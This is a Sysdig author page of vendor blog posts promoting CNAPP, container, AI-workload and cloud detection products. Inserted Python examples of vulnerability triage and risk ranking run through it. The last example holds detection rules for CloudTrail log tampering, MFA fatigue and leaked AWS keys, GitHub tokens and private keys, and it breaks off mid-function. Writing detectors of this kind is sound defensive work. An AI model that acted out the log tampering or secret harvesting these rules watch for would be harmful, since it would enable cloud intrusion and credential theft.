Sysdig | Matt Kim
https://sysdig.com/blog/author/matt-kim/

SANS Cloud-Native Application Protection Platforms (CNAPP) Buyers Guide
https://sysdig.com/blog/sans-cnapp-buyers-guide/
Published: Thu, 25 Jul 2024 11:00:00 +0000

The SANS Cloud-Native Application Protection Platform (CNAPP) Buyers Guide gives companies a deep dive into what to look for in a CNAPP solution. As organizations continue to shift towards integrated platform-based solutions for their cloud security needs, it becomes critical to evaluate whether a CNAPP solution meets all the requirements across use cases like posture management, permissions management, vulnerability management, and threat detection and response. Ideally, teams will be able to unify these capabilities within a single, comprehensive platform to manage risk and defend against attacks.

The SANS CNAPP Buyers Guide provides an in-depth look at what criteria to consider when purchasing a CNAPP solution, as well as a checklist of required and desired capabilities for the security platform. By utilizing this guide as a resource to navigate the buying process, you can ensure your security platform provides a unified cloud and container security experience with no blind spots. Download the full guide here.

Why Purchase a CNAPP?

The explosive growth of cloud and containers has created an expanded and dynamic attack surface that security teams need to defend. As more developers deploy containerized microservices and utilize cloud services and infrastructure, monitoring and protecting them becomes more complex. Security teams now have dynamic workloads with 10–100x more containerized compute instances, large volumes of cloud assets with dynamic activity to track, and messy and overly permissive identity and access management (IAM) permissions to manage. This rapid expansion of the attack surface in cloud-native applications has led to many vulnerabilities, misconfigurations, and security weaknesses to manage, and security teams need a tool that provides full visibility across cloud and containers.

As weaknesses in security posture have increased, security and operations teams have become overwhelmed by the number of alerts and vulnerabilities they face, leaving organizations with long exposure windows to critical vulnerabilities. As the adoption of cloud services and containers/Kubernetes increases the sources of data to analyze, you need a way to process all this data into insights that can be applied to remediating security issues. Without significant additional context on your cloud workloads and infrastructure, it is difficult for teams to prioritize which of these alerts actually present significant risks and which are just noise. An effective CNAPP will use knowledge of which containers and packages are actually running to provide actionable insights that security and DevOps teams can use to prioritize the most critical risks.

The move to the cloud has also led to an evolution in the threat landscape to take advantage of the security gaps in cloud-native applications. Bad actors have adapted their tactics and techniques to quickly compromise cloud environments with valid credentials, find and exploit vulnerabilities, and move laterally across workloads and clouds to extract maximum return from any breach. The changes to the threat landscape call for a complete solution that can detect these modern threats throughout your cloud-native infrastructure.

Traditional Tools Fall Short

Many traditional security tools are not suited to cloud workloads, environments, and the threats that have evolved to take advantage of their weaknesses. Tools like endpoint detection and response (EDR) solutions lack critical visibility into cloud services, workloads, and Kubernetes, and create blind spots that can easily be exploited. Traditional tools also often send many alerts and signals, but lack the context needed to rapidly and effectively respond to threats in cloud-based applications and workloads. The dynamic nature of software development and deployment, as well as the ephemeral nature of containerized environments, only add to the complexity, and security and DevOps teams need a security tool specifically designed to handle cloud-native environments.

Further, point solutions don’t work. Often organizations must choose from among multiple solutions, or even choose vendors that stitch together a workflow from multiple acquisitions. These tools don’t communicate with each other or share context, resulting in a reactive approach of dealing with disparate vulnerability findings, posture violations, and threats as they become a problem. This approach leaves teams without the insights they need to prioritize issues based on their impact.

What to Look for in a CNAPP Solution

Security and DevOps teams need comprehensive visibility into workloads, cloud activity, and user behavior in real time. The number of signals that teams have to make sense of is exploding, and a comprehensive CNAPP solution needs to help users focus on the most critical risks in their cloud-native infrastructure.

Deep knowledge of what is running right now is what shrinks the list of things that need attention first. Knowledge of what is running (or simply what is in use) is the context security and DevOps teams need to act on the most critical risks first, and that same context can be fed back early in the development lifecycle to give “shift-left” actionable prioritization. With all the sources of data that a CNAPP has to ingest and analyze, an effective CNAPP solution needs runtime insights to help teams focus on the risks that really matter. For example, by filtering on vulnerabilities in packages active at runtime, you can reduce vulnerability noise by up to 95%.

With the SANS CNAPP Buyers Guide, you can make sure your organization is focused on the most critical risks in your cloud infrastructure. The guide includes a detailed checklist of important capabilities and features to look for in a CNAPP solution. While there are too many to list here in full, the capabilities of an effective CNAPP solution fall into these areas.

User Experience: Many solutions today are not intuitive and may be difficult to work with. Effective CNAPP solutions should offer unified security and risk dashboards, as well as aggregated security findings and remediation suggestions through simple interfaces. They should also be simple to deploy.

Cloud Workload Protection (CWP): A CNAPP solution should protect workloads across the software lifecycle, with capabilities in vulnerability management, configuration management for containers/Kubernetes, and runtime security/incident response. The ability to prioritize the most critical vulnerabilities or configurations based on in-use risk exposure is key. The tool should integrate with CI/CD tools, provide rich context to investigate alerts, and give suggestions to fix at the source.

Cloud Security Posture Management (CSPM): Continuous visibility, detection, and remediation of cloud security misconfigurations is key for a CNAPP solution. The solution should offer capabilities in cloud vulnerability management, configuration management, and permissions/entitlement management (e.g., CIEM).

Cloud Detection and Response (CDR): Detection and response capabilities related to cloud-centric threats are critical. Effective CNAPP solutions should expand beyond just workload runtime security and address the cloud control plane to detect suspicious activities across users and services.

Enterprise-grade Platform: Effective CNAPP solutions often have enhancements and additional features that integrate and align with API use, scripting and automation functionality, auditing and logging, and support for large-scale deployments.

Want to see the full list of capabilities? Download the full SANS Cloud-Native Application Protection Platform (CNAPP) Buyers Guide now for all the details.

Next-Gen Container Security: Why Cloud Context Matters
https://sysdig.com/blog/next-gen-container-security-why-cloud-context-matters/
Published: Thu, 30 May 2024 14:30:00 +0000

Container security has experienced significant transformation over the past decade. From the emergence of foundational tools like Docker to the maturation of orchestration platforms such as Kubernetes, the container security landscape looks different than it did even a few years ago. With Gartner predicting 95% of organizations will be running containerized applications in production by 2028, it’s clear that container security is going to be a key priority for most organizations moving forward. The rapid evolution of technology has not only driven advancements in containerization but has also created opportunities for attacks targeting containers and cloud-native infrastructure. Attackers are able to automate their reconnaissance and other tactics due to the uniformity of cloud providers’ APIs and architectures, executing attacks in less than 10 minutes. Organizations need to rethink their approach to cloud container security and workload protection or risk being outpaced by these attacks.

A New Normal Brings New Challenges

In modern application development, containers are quickly becoming a popular tool for developers, providing numerous advantages including improved agility and scalability. They provide developers with flexibility to update a specific container or microservice instead of the entire application, greatly speeding the pace of innovation. The convergence of cloud migration and widespread adoption of DevOps practices has pushed containerization as a prevailing trend, empowering organizations to streamline their operations and increase the pace of new releases.

While adoption increases every year, containers are still a relatively young technology, with many companies still in the early stages of their containerization journey. The ever-evolving technology ecosystem surrounding containers, including Kubernetes, introduces constant shifts and updates, and development teams and infrastructure have expanded faster than security teams. As a result, there is a general scarcity of the cloud-native security talent and expertise needed to secure these environments effectively. We have also seen developers increasingly shoulder security responsibilities as organizations embrace DevSecOps strategies. Containers offer many advantages for innovation and agility, but they also expand the potential attack surface, posing a challenge for security teams trying to balance security and speed.

Two Sides Of Container Security

As container technology continues to mature, two key security trends have emerged over the last few years. The first revolves around key risks getting obscured by the endless noise and alerts created by many security tools. Under the DevSecOps model, developers are often responsible for fixing vulnerabilities in the code packages they deploy but find themselves overwhelmed by the sheer volume of alerts. Our research found that of cloud workloads with critical or high severity vulnerabilities, only 1.2% are exploitable, have a fix, and are actually in use by the application. The number of new cloud-related CVEs increased by nearly 200% in 2023, and the sharing of open source container images has left security teams facing a large number of critical and high-severity container vulnerabilities. The challenge many organizations face lies in discerning which of these risks actually have a high chance of exploitation and which can be deprioritized. The last thing any developer or security team wants is to waste valuable time sifting through a long list of security findings, only to discover that many are inconsequential.
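The triage described in the paragraph above (exploitable, fixable, and actually in use), which is the same runtime in-use filter the CNAPP Buyers Guide post earlier on this page credits with cutting vulnerability noise, can be written down as a small prioritization routine. The following is an added example, not Sysdig code: the findings, the package names and the runtime in-use set are constructed sample data, and the field names are assumptions rather than any real scanner's schema.

```python
"""Runtime-aware vulnerability triage (added example, not Sysdig code).

Static image scanning reports every vulnerable package in the image. A
runtime agent reports which packages were actually loaded or executed.
Joining the two, plus exploit and fix availability, yields a short
"fix now" list and a measurable noise reduction.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    cve: str               # constructed placeholder IDs below, not real CVEs
    package: str           # package name as the image scanner reports it
    severity: str          # "critical" | "high" | "medium" | "low"
    fix_available: bool    # a patched version exists
    exploit_known: bool    # public exploit code or known exploitation in the wild


SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}

# Constructed sample: what a static scan of one workload image reports.
SCAN_FINDINGS = [
    Finding("CVE-SAMPLE-0001", "openssl", "critical", True, True),
    Finding("CVE-SAMPLE-0002", "libxml2", "high", True, False),
    Finding("CVE-SAMPLE-0003", "curl", "critical", False, True),
    Finding("CVE-SAMPLE-0004", "imagemagick", "critical", True, True),
    Finding("CVE-SAMPLE-0005", "zlib", "high", True, False),
    Finding("CVE-SAMPLE-0006", "python3", "medium", True, False),
    Finding("CVE-SAMPLE-0007", "libpng", "high", True, True),
    Finding("CVE-SAMPLE-0008", "perl", "critical", True, True),
    Finding("CVE-SAMPLE-0009", "git", "high", True, False),
    Finding("CVE-SAMPLE-0010", "sqlite3", "medium", True, False),
]

# Constructed sample: packages the runtime agent observed loaded/executed
# in the running container (assumed to use the same naming as the scanner).
IN_USE = {"openssl", "libxml2", "curl", "glibc"}


def in_use_only(findings, in_use):
    """The runtime filter alone: keep findings whose package is actually loaded."""
    return [f for f in findings if f.package in in_use]


def noise_reduction(findings, in_use):
    """Share of scanner findings removed by the in-use filter (0.0 to 1.0)."""
    if not findings:
        return 0.0
    return 1 - len(in_use_only(findings, in_use)) / len(findings)


def triage(findings, in_use):
    """Bucket findings by how urgently they need a developer's attention.

    fix_now:      in use AND known exploit AND a fix exists -> patch today
    in_use_watch: in use but no exploit yet, or no fix available -> mitigate/monitor
    backlog:      package never loaded at runtime -> schedule with normal upgrades
    Each bucket is ordered by severity (stable, so scan order breaks ties).
    """
    tiers = {"fix_now": [], "in_use_watch": [], "backlog": []}
    for f in sorted(findings, key=lambda f: SEVERITY_RANK[f.severity]):
        if f.package not in in_use:
            tiers["backlog"].append(f.cve)
        elif f.exploit_known and f.fix_available:
            tiers["fix_now"].append(f.cve)
        else:
            tiers["in_use_watch"].append(f.cve)
    return tiers


if __name__ == "__main__":
    print(f"noise reduction from in-use filter: {noise_reduction(SCAN_FINDINGS, IN_USE):.0%}")
    for tier, cves in triage(SCAN_FINDINGS, IN_USE).items():
        print(f"{tier:13s} {cves}")
```

On the constructed data the runtime filter alone drops 7 of 10 findings, and only one of the remaining three (a critical, exploited, fixable package that the workload actually loads) lands in the fix-now bucket; the curl finding stays visible because it is in use and exploited but has no fix, which is exactly the case a team wants to see rather than silently drop.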

The second major trend is the impressive speed at which cloud attacks now move. As more companies have shifted to cloud-native applications, attackers have adapted to leverage the architecture upon which these apps are built. After finding an exploitable asset, malicious actors need only minutes to execute an attack and start causing damage. The initial stages of cloud attacks can be heavily automated, and attackers are coming up with all sorts of sophisticated techniques to disguise their presence. In just the past year, we’ve observed numerous attacks where a malicious actor gained initial access through a vulnerability in a container image or open source software dependency, including the well-known XZ Utils backdoor that targeted OpenSSH’s sshd. Once inside the environment, attackers can easily move laterally – whether from workload to cloud or vice versa – hunting for credentials or sensitive data to exploit for profit.

A Modern Approach To Cloud Container Security And Workload Protection

As the container security landscape evolves, organizations are looking to strike a balance between prevention and defense. Initially, many utilized different tools to secure their containers than they used for other parts of their cloud infrastructure. However, container threats now often cross cloud domains, making this segmented approach slow and outdated. The lack of communication between these tools results in viewing container security in isolation. While an isolated tool might detect a malicious actor breaching a vulnerable container, the post-escape attack path remains obscured. A more robust approach is to use a unified platform that connects the dots across your broad cloud infrastructure to thwart and respond to threats with agility. Already, numerous enterprises have started this journey towards consolidating cloud security. In the 2023 Gartner® Market Guide for Cloud-Native Application Protection Platforms (CNAPP), Gartner predicts this trend will continue, forecasting that by 2025, 60% of enterprises will have consolidated cloud workload protection platform (CWPP) and cloud security posture management (CSPM) capabilities to a single vendor or CNAPP. Container security falls squarely into the CWPP category, and security leaders and practitioners will need to keep up with this change as the boundaries between domains across the cloud begin to blur.

To adapt to this new normal, organizations need to rethink their approach to container security. Despite the evolving threat landscape, the fundamental challenge remains the same: security and developer teams must catch vulnerabilities in container images and detect threats at runtime. But now, they must approach this challenge with a different lens. In the modern environment, container security and workload protection need cloud context to be truly effective. Correlating container findings with context across the cloud is essential to getting the full picture of how an attacker can exploit your environment. Armed with this context, teams can focus on active real-time risk in their organization and view containers as part of a larger story.

Container security and workload protection typically encompass use cases like threat detection and response, vulnerability management, and Kubernetes security posture management (KSPM). These elements remain critical, but this new approach integrates them with findings like real-time configuration changes, risky identity behavior, and cloud log detections. These other findings are usually associated with CSPM but are becoming relevant for container security. Combining these factors with real-time contextual insights on vulnerabilities and container threats paints a comprehensive picture of potential attack paths throughout a user’s environment. Focusing solely on containers may reveal an initial breach but fails to unveil the extent of damage or anticipate the attacker’s next move. As long as your organization has workloads running in the cloud, this additional cloud context provides great value.

Bringing The Best Of Agent And Agentless To Workload Protection

The best way to achieve this balance of security and speed combines agent-based and agentless strategies. There is an ongoing debate over whether agent-based or agentless approaches are more effective, with agentless instrumentation becoming a popular approach due to its ease of deployment and rapid time to value. For this reason, many security teams prefer to implement an agentless approach wherever possible. While there are benefits to both approaches, the most effective solutions will integrate both for comprehensive visibility. For containers, agents provide deeper runtime visibility and real-time detection for faster time to discovery. Unfortunately, it is not always possible to deploy them universally due to resource constraints.

In these cases, leveraging agentless instrumentation to supplement agents ensures full breadth of coverage across your infrastructure. For container security, deploying agents strategically allows you to prioritize vulnerabilities based on in-use packages and detect threats in real time – capabilities that are not possible with a solely agentless approach. Supplementing this with agentless deployments enables quick basic vulnerability scanning across all containers. As previously highlighted, integrating cloud context into workload protection – often achieved through agentless means – is a great way to anticipate and combat live attacks. This approach not only tackles the traditional challenges associated with container security and workload protection but also provides a full picture and rich context to address the most significant risks. Both approaches bring clear benefits to container security, but this new approach of implementing agentless where possible to supplement the deeper insights from agents brings the best of both worlds.

Security Must Continue To Adapt

The rise of containerization and cloud-native applications, along with the advances made by attackers, has brought us to a challenging point for workload protection. In this constant chess game, security teams must remain proactive and adaptable, continuously evolving their defenses or risk being breached by emerging threats.

Ultimately, organizations that adapt the quickest will be best equipped to detect attacks that strike without warning in a matter of minutes. As boundaries between cloud domains continue to become less defined and the market moves towards consolidation, the ability to connect events across your entire cloud infrastructure will be key to protecting your assets and mitigating risk.

Accelerating AI Adoption: AI Workload Security for CNAPP
https://sysdig.com/blog/ai-workload-security-for-cnapp/
Published: Tue, 30 Apr 2024 13:45:00 +0000

When it comes to securing applications in the cloud, adaptation is not just a strategy but a necessity. We’re currently experiencing a monumental shift driven by the mass adoption of AI, fundamentally changing the way companies operate. From optimizing efficiency through automation to transforming the customer experience with speed and personalization, AI has empowered developers with exciting new capabilities. While the benefits of AI are undeniable, it is still an emerging technology that poses inherent risks for organizations trying to understand this changing landscape. That’s where Sysdig comes in to secure your organization’s AI development and keep the focus on innovation.

Today, we are thrilled to announce the launch of AI Workload Security to identify and manage active risk associated with AI environments. This new addition to our cloud-native application protection platform (CNAPP) will help security teams see and understand their AI environments, identify suspicious activity on workloads that contain AI packages, and prioritize and fix issues fast.

AI has changed the game

The explosive growth of AI in the last year has reshaped the way many organizations build applications. AI has quickly become a mainstream topic across all industries and a focus for executives and boards. Advances in the technology have led to significant investment in AI, with more than two-thirds of organizations expected to increase their AI investment over the next three years across all industries. GenAI specifically has been a major catalyst of this trend, driving much of this interest. The Cloud Security Alliance’s recent State of AI and Security Survey Report found that 55% of organizations are planning to implement GenAI solutions this year. Sysdig’s research also found that since December 2023, the deployment of OpenAI packages has nearly tripled.

With more companies deploying GenAI workloads, Kubernetes has become the deployment platform of choice for AI. Large language models (LLMs) are a core component of many GenAI applications that can analyze and generate content by learning from large amounts of text data. Kubernetes has numerous characteristics that make it an ideal platform for LLMs, providing advantages in scalability, flexibility, portability, and more. LLMs require significant resources to run, and Kubernetes can automatically scale resources up and down, while also making it simple to export LLMs as container workloads across various environments. The flexibility when deploying GenAI workloads is unmatched, and top companies like OpenAI, Cohere, and others have adopted Kubernetes for their LLMs. 

From opportunity to risk: security implications of AI

AI continues to advance rapidly, but the widespread adoption of AI deployment creates a whole new set of security risks. The Cloud Security Alliance survey found that 31% of security professionals believe AI will be of equal benefit to security teams and malicious third parties, with another 25% believing it will be more beneficial to malicious parties. Sysdig’s research also found that 34% of all currently deployed GenAI workloads are publicly exposed, meaning they are accessible from the internet or another untrusted network without appropriate security measures in place. This increases the risk of security breaches and puts the sensitive data leveraged by GenAI models in danger.

Another development that highlights the importance of AI security in the cloud is the set of forthcoming guidelines and the increasing pressure to audit and regulate AI, as proposed in the Biden administration’s October 2023 Executive Order and in the National Telecommunications and Information Administration (NTIA) recommendations that followed in March 2024. The European Parliament also adopted the AI Act in March 2024, introducing stringent requirements on risk management, transparency, and other issues. Ahead of this imminent AI legislation, organizations should assess their own ability to secure and monitor AI in their environments.

Many organizations lack experience securing AI workloads and identifying risks associated with AI environments. Just like the rest of an organization’s cloud environment, it is critical to prioritize active risks tied to AI workloads, such as vulnerabilities in in-use AI packages or malicious actors trying to modify AI requests and responses. Without full understanding and visibility of AI risk, it’s possible for AI to do more harm than good.

Mitigate active AI risk with AI Workload Security

We’re excited to unveil AI Workload Security in Sysdig’s CNAPP to help our customers adopt AI securely. AI Workload Security allows security teams to identify and prioritize workloads in their environment that run leading AI engines and software packages, such as OpenAI and TensorFlow, and to detect suspicious activity within these workloads. With these new capabilities, your organization can get real-time visibility of the top active AI risks, enabling your teams to address them immediately. Sysdig helps organizations manage and control their AI usage, whether it’s official or deployed without proper approval, so they can focus on accelerating innovation.

Sysdig’s AI Workload Security ties into our Cloud Attack Graph, the neural center of the Sysdig platform, integrating with our Risk Prioritization, Attack Path Analysis, and Inventory features to provide a single view of correlated risks and events.

AI Workload Security in action

The introduction of real-time AI Workload Security helps companies prioritize the most critical risks associated with AI environments. Sysdig’s Risks page provides a stack-ranked view of risks, evaluating which combinations of findings and context need to be addressed immediately across your cloud environment. Publicly exposed AI packages are highlighted along with other risk factors. In the example below, we see a critical risk with the following findings:

  1. Publicly exposed workload
  2. Contains an AI package
  3. Has a critical vulnerability with a known exploit in an in-use package
  4. Contains a high confidence event

Based on the combination of findings, users can determine the severity of the risk that exposed AI workloads create. They can also gather more context around the risk, including which packages on the workload are running AI and whether vulnerabilities on these packages can be fixed with a patch.
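The stack-ranking described above turns several independent signals (exposure, package inventory, in-use vulnerabilities, runtime events) into one ordered list per workload. Here is an added example of that correlation, not Sysdig code and not the Risks page's actual schema or scoring: the workload records, the list of names treated as "AI packages", and the rule that maps the number of findings to a severity are all constructed assumptions, chosen to mirror the four findings listed above.

```python
"""Correlating independent findings into one ranked risk per workload.

Added example, not Sysdig code. Records, AI package list and weighting
are assumptions built to mirror the four findings discussed in the text.
"""
from dataclasses import dataclass, field

# Assumed: a package whose name contains one of these is treated as an AI package.
AI_PACKAGE_NAMES = ("openai", "tensorflow", "torch", "transformers", "langchain")


@dataclass(frozen=True)
class Vuln:
    cve: str               # constructed placeholder IDs below, not real CVEs
    package: str
    severity: str
    exploit_known: bool


@dataclass
class Workload:
    name: str
    public_exposed: bool   # reachable from the internet / an untrusted network
    packages: list         # package names from the image SBOM
    in_use: set            # packages the runtime agent saw loaded or executed
    vulns: list = field(default_factory=list)
    events: list = field(default_factory=list)   # (rule_name, confidence) from runtime detection


def ai_packages(w):
    """Installed packages that look like AI engines or SDKs."""
    return [p for p in w.packages if any(n in p.lower() for n in AI_PACKAGE_NAMES)]


def exploitable_in_use(w):
    """Critical vulns with a known exploit on a package the workload actually loads."""
    return [v for v in w.vulns
            if v.severity == "critical" and v.exploit_known and v.package in w.in_use]


def findings(w):
    """The correlated findings for one workload, in the order the text lists them."""
    out = []
    if w.public_exposed:
        out.append("publicly exposed")
    if ai_packages(w):
        out.append("contains AI package")
    if exploitable_in_use(w):
        out.append("critical exploitable vuln on in-use package")
    if any(conf == "high" for _, conf in w.events):
        out.append("high-confidence runtime event")
    return out


def severity(w):
    """Assumed mapping: the more independent findings coincide, the worse the risk."""
    return {4: "critical", 3: "high", 2: "medium"}.get(len(findings(w)), "low")


def rank(workloads):
    """Stack-rank: most findings first, then publicly exposed first, then by name."""
    return sorted(workloads, key=lambda w: (-len(findings(w)), not w.public_exposed, w.name))


# Constructed sample inventory.
LLM_GATEWAY = Workload(
    "llm-gateway", public_exposed=True,
    packages=["openai", "fastapi", "openssl"], in_use={"openai", "fastapi", "openssl"},
    vulns=[Vuln("CVE-SAMPLE-0001", "openssl", "critical", True)],
    events=[("Interpreter spawned in container", "high")],
)
ML_TRAINER = Workload(
    "ml-trainer", public_exposed=False,
    packages=["tensorflow", "numpy", "libpng"], in_use={"tensorflow", "numpy"},
    vulns=[Vuln("CVE-SAMPLE-0002", "libpng", "critical", True)],   # critical, but never loaded
)
WEB_FRONTEND = Workload(
    "web-frontend", public_exposed=True,
    packages=["nginx"], in_use={"nginx"},
    events=[("Outbound connection to unexpected port", "high")],
)
WORKLOADS = [ML_TRAINER, WEB_FRONTEND, LLM_GATEWAY]

if __name__ == "__main__":
    for w in rank(WORKLOADS):
        print(f"{w.name:13s} {severity(w):8s} {findings(w)}")
```

The ordering is the point: the trainer carries a critical, exploited vulnerability, but because the affected package is never loaded and the workload is not exposed it ranks below a plain web frontend with a high-confidence runtime event, while the exposed LLM gateway that stacks all four findings is the one to open first.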

(Screenshot: AI workload risks)

Digging deeper into these risks, users can also get a more visual representation of the exploitable links across resources with Attack Path Analysis. Sysdig uncovers potential attack paths involving workloads with AI packages, showing how they fit with other risk factors like vulnerabilities, misconfigurations, and runtime detections on these workloads. Users can see which AI packages running on the workload are in use and how vulnerable packages can be fixed. With the power of AI Workload Security, users can quickly identify critical attack paths involving their AI models and data, and correlate with real-time events.

Sysdig also gives users the ability to identify all of the resources in your cloud environment that have AI packages running. AI Workload Security empowers Sysdig’s Inventory, enabling users to view a full list of resources containing AI packages with a single click, as well as identify risks on these resources.

Want to learn more?

Armed with these new capabilities, you’ll be well equipped to defend against active AI risk, helping your organization realize the full potential of AI’s benefits. These advancements add another layer of security to our top-rated CNAPP solution, stretching our coverage further across the cloud. Learn more about Sysdig’s leading CNAPP.

See Sysdig in action

Sign up for our Kraken Discovery Lab to execute real cloud attacks and then assume the role of the defender to detect, investigate, and respond.

Stop Cloud Breaches in Real Time and Accelerate Investigation and Response with Sysdig CDR
https://sysdig.com/blog/stop-cloud-breaches-in-real-time/
Published: Wed, 07 Jun 2023 14:00:00 +0000

Is your organization grappling with the relentless pace of ever-changing threats in the cloud? Are you spending hours investigating security events without identifying the root cause of the problem?

The move to the cloud and containers has sped up innovation but also expanded the attack surface that security teams must defend. As organizations grow their cloud infrastructures, they encounter the challenge of sprawl, with hundreds of unchecked and potentially vulnerable applications, services, and identities. Cybercriminals are adapting to this landscape, utilizing advanced techniques to gain access to these environments and extract maximum value. With the global average cost of a data breach reaching a staggering $4.35 million last year, according to IBM, staying ahead of attackers is critical to prevent becoming another statistic in this alarming trend.

Expanding detection and response across the application life cycle

The dynamic attack surface of the cloud has greatly increased the complexity of securing cloud-native applications. Organizations are deploying hundreds or even thousands of containers in production, and managing large volumes of cloud assets and permissions. As a result, security teams and developers need an integrated tool that instantly and continuously provides visibility and shares context across the entire environment. More and more organizations are looking for a cloud-native application protection platform (CNAPP) that consolidates security across the application life cycle, instead of relying on multiple costly solutions that protect different areas.

This is especially important since attackers only require a single entry point into your environment to inflict substantial harm. Once inside, they can move laterally to access sensitive data or carry out cryptojacking attacks. In this battle, the integration of cloud detection and response (CDR) within a comprehensive CNAPP becomes a vital capability. Security teams must possess the ability to swiftly identify various types of threats spanning their entire infrastructure, and respond promptly within a limited timeframe. The scope of threat detection has now expanded to encompass not only workload runtime security, but also cloud services, identities, and the software supply chain. By consolidating CDR and CNAPP, your organization can attain a full understanding of potential threats and proactively address them before they manifest into significant issues.

Most existing cloud security tools fall short

Most existing cloud security tools are slow to identify suspicious behavior and don’t provide sufficient context for security teams to understand how an attack was carried out. This lack of context hinders effective incident response. Once alerted by these tools, organizations often find themselves in a time-consuming and frustrating process of sifting through numerous snapshots, logs, and disparate data sources, trying to piece together the intricate chain of events. This delay prolongs the exposure to threats by hours or even days, allowing them to cause widespread damage while the organization remains in the dark, unaware of the full extent of the breach. Other conventional security tools, like endpoint detection and response (EDR) tools, are not designed to handle the scale or velocity of the cloud and struggle to address cloud-native constructs or show correlation across user activity and workload anomalies.

In evaluating security tools designed for the cloud, there is a debate over whether agent-based or agentless approaches are more effective. The most effective solutions, however, will incorporate both. In the 2023 Gartner® Market Guide for Cloud-Native Application Protection Platforms, Gartner advises prioritizing CNAPPs that “provide a variety of runtime visibility techniques…to provide the most flexibility at deployment.” By leveraging a combination of real-time, agent-based detections and log-based, agentless detections, you can swiftly identify threats across your entire cloud environment and surface the necessary context to respond. Existing cloud security vendors that are unable to offer strong agent-based AND agentless solutions will never provide the complete approach necessary to effectively combat modern threats.

Real-time and end-to-end threat detection

Sysdig is expanding our CDR capabilities to provide end-to-end threat detection throughout the entire cloud fabric. With Sysdig Secure, we are introducing a new agentless deployment of Falco for processing cloud logs to detect threats across cloud, identity, and the software supply chain.

Stop Cloud Breaches in Real Time and Accelerate Investigation and Response with Sysdig CDR

Sysdig’s agentless deployment model supplements our existing agent-based deployment of Falco. We’ve already solved the hard part of cloud security, cloud-native runtime security, with our agent-based workload protection. Combined with our agentless detection capabilities, Sysdig provides 360-degree visibility and correlation across workloads, identities, cloud services, and third-party applications. No matter what entry point an attack targets, our flexible deployment models empower you to protect your cloud and applications effectively.

Identity threat detection

Malicious actors continue to refine techniques for obtaining valid credentials to reach sensitive data. Sysdig’s Okta detections help security teams defend against common identity attacks, such as multifactor authentication (MFA) fatigue, in which an attacker who already holds a password spams push notifications until the user approves one, and account takeover, protecting your valuable data from unauthorized access.

Software supply chain detection

With 61% of all container images pulled from public repositories, threat actors increasingly target those repositories as an attack vector. Sysdig’s GitHub detections extend threat detection into the software supply chain, alerting security and DevOps teams to common GitHub security risks, such as a secret being pushed into a repository or a private repository becoming public.
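The three log sources named above (cloud provider audit logs, Okta identity events, and GitHub events) each need their own detection logic, and an agentless pipeline runs all of them over the same stream. The following is an added example written for this page, not Sysdig's or Falco's code: a self-contained Python script with one detection per source. The sample records are constructed; the field names follow the public AWS CloudTrail, Okta System Log and GitHub webhook formats, and the `patch` text attached to GitHub commits is an assumption (a push webhook carries file lists, not diffs, so a real pipeline would fetch the diff separately).

```python
"""Added example (not Sysdig's or Falco's code): three log-based detections of the
kind an agentless CDR pipeline runs over cloud, identity and supply-chain events.
All sample records below are constructed; the `patch` field on GitHub commits is
an assumption (push webhooks do not carry diffs)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# ---- constructed sample events ---------------------------------------------
CLOUDTRAIL_EVENTS = [
    {"eventTime": "2023-06-01T10:00:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deployer"}},
    {"eventTime": "2023-06-01T10:00:05Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "DescribeInstances", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deployer"}},
]
OKTA_EVENTS = [
    {"published": "2023-06-01T10:01:00Z", "eventType": "user.mfa.okta_verify.deny_push",
     "actor": {"alternateId": "alice@example.com"}},
    {"published": "2023-06-01T10:01:30Z", "eventType": "user.mfa.okta_verify.deny_push",
     "actor": {"alternateId": "alice@example.com"}},
    {"published": "2023-06-01T10:01:45Z", "eventType": "user.session.start",
     "actor": {"alternateId": "bob@example.com"}},
    {"published": "2023-06-01T10:02:10Z", "eventType": "user.mfa.okta_verify.deny_push",
     "actor": {"alternateId": "alice@example.com"}},
    {"published": "2023-06-01T10:05:00Z", "eventType": "user.mfa.okta_verify.deny_push",
     "actor": {"alternateId": "bob@example.com"}},
]
GITHUB_EVENTS = [
    {"event": "repository", "action": "publicized", "sender": {"login": "dev1"},
     "repository": {"full_name": "acme/billing"}},
    {"event": "push", "sender": {"login": "dev2"}, "repository": {"full_name": "acme/infra"},
     "commits": [{"id": "9f3c2a1b7e", "patch": "+aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"}]},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def _finding(source, rule, actor, detail, time):
    return {"source": source, "rule": rule, "actor": actor, "detail": detail, "time": time}

# CloudTrail: API calls that blind the audit trail are high-signal whoever makes them.
TRAIL_TAMPER = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}

def detect_cloudtrail(events):
    return [_finding("cloudtrail", "CloudTrail logging tampered", e["userIdentity"]["arn"],
                     e["eventName"], e["eventTime"])
            for e in events
            if e.get("eventSource") == "cloudtrail.amazonaws.com"
            and e.get("eventName") in TRAIL_TAMPER]

# Okta: MFA fatigue shows up as a burst of denied Okta Verify pushes for one user.
DENY_PUSH = "user.mfa.okta_verify.deny_push"

def detect_mfa_fatigue(events, threshold=3, window=timedelta(minutes=10)):
    findings, recent, alerted = [], defaultdict(deque), set()
    for e in sorted(events, key=lambda x: x["published"]):
        if e.get("eventType") != DENY_PUSH:
            continue
        actor, t = e["actor"]["alternateId"], _ts(e["published"])
        q = recent[actor]
        q.append(t)
        while t - q[0] > window:      # slide the window: drop denials older than `window`
            q.popleft()
        if len(q) >= threshold and actor not in alerted:
            alerted.add(actor)        # one alert per user per burst, not one per push
            findings.append(_finding("okta", "Possible MFA fatigue", actor,
                                     f"{len(q)} push denials within {window}", e["published"]))
    return findings

# GitHub: visibility changes and committed credentials are the supply-chain signals.
SECRET_PATTERNS = {
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "GitHub token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "private key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

def detect_github(events):
    findings = []
    for e in events:
        repo, actor = e["repository"]["full_name"], e["sender"]["login"]
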